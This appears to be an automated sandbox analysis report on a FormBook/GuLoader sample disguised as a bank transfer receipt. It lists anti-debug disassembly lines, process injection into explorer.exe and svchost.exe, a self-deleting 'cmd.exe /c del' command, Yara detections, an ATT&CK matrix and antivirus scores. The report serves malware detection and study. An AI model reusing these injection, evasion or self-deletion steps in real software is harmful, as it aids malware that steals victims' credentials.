Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A24F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A24F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A5E730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE131B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03ABFF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03ABFF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A2DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A3FF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF8F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A53B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A53B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A2DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A3EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF8B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A2F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A252A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A252A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A252A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A252A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A252A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF0EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF0EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF0EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AA46A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A5FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03ABFE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A5D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A5D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A376E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A516E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A68EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A536CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03ADFEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF8ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A2E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03ADFE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A2C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A2C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A2C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A43A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03ADB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03ADB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF8A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A3766D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A4AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A4AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A4AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A4AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A4AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A6927A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A29240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A29240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A29240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A29240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A37E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A37E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A37E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A37E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A37E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A37E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A535A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A5A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A4C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A22D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A22D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A22D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A22D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A22D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A5FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A5FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A2B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A2B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A2B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AD8DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A44120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A44120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A44120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A44120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A44120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A2AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF8D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AAA537 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A54D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A54D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A54D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A5513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A5513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A29100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A29100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A29100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A2B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A2B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A4C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A4C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A4B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A4B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A63D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AA3540 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A47D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A690AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A5F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A5F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A5F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A29080 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AA3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AA3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE14FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AA6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AA6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AA6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF8CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03ABB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03ABB8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03ABB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03ABB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03ABB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03ABB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A3B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A3B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A3B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A3B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A5BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AA6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AA6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AA6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AA6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AA7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AA7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AA7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A4746D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF1074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE2073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A40050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A40050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03ABC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03ABC450 mov eax, dword ptr fs:[00000030h]

Source: C:\Windows\SysWOW64\svchost.exe

Process queried: DebugPort

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Code function: 0_2_00F35165 SetFileAttributesA,LdrResolveDelayLoadedAPI,LocalFree,LocalFree,SetCurrentDirectoryA,

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Code function: 0_2_00F37360 SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Code function: 0_2_00F36C35 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Thread register set: target process: 3352
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Thread register set: target process: 3352

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe"

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Code function: 0_2_00F315FC LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,

Source: explorer.exe, 00000015.00000000.740986276.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000015.00000000.727918009.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000015.00000000.756092211.0000000000B68000.00000004.00000020.sdmp	Binary or memory string: Progman\Pr
Source: explorer.exe, 00000015.00000000.741349189.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.756746468.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.728123965.00000000011E0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000015.00000000.729737334.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 00000015.00000000.741349189.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.756746468.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.728123965.00000000011E0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000015.00000000.741349189.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.756746468.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.728123965.00000000011E0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000015.00000000.741349189.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.756746468.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.728123965.00000000011E0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000015.00000000.749218115.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000015.00000000.733926654.0000000008778000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndh

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Code function: 0_2_00F375A8 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Code function: 0_2_00F32A7E GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,

Stealing of Sensitive Information:

Yara detected Generic Dropper

Show sources

Source: Yara match	File source: Process Memory Space: nongrav.exe PID: 4520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 6932, type: MEMORYSTR

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY

GuLoader behavior detected

Show sources

Source: Initial file

Signature Results: GuLoader behavior

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Command and Scripting Interpreter2	Path Interception	Access Token Manipulation1	Virtualization/Sandbox Evasion22	Input Capture1	System Time Discovery1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel21	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Process Injection312	Access Token Manipulation1	LSASS Memory	Security Software Discovery421	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection312	Security Account Manager	Virtualization/Sandbox Evasion22	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol113	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information4	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Rundll321	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing12	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery16	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	15%	Metadefender		Browse
Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	27%	ReversingLabs	Win32.Trojan.Mucc
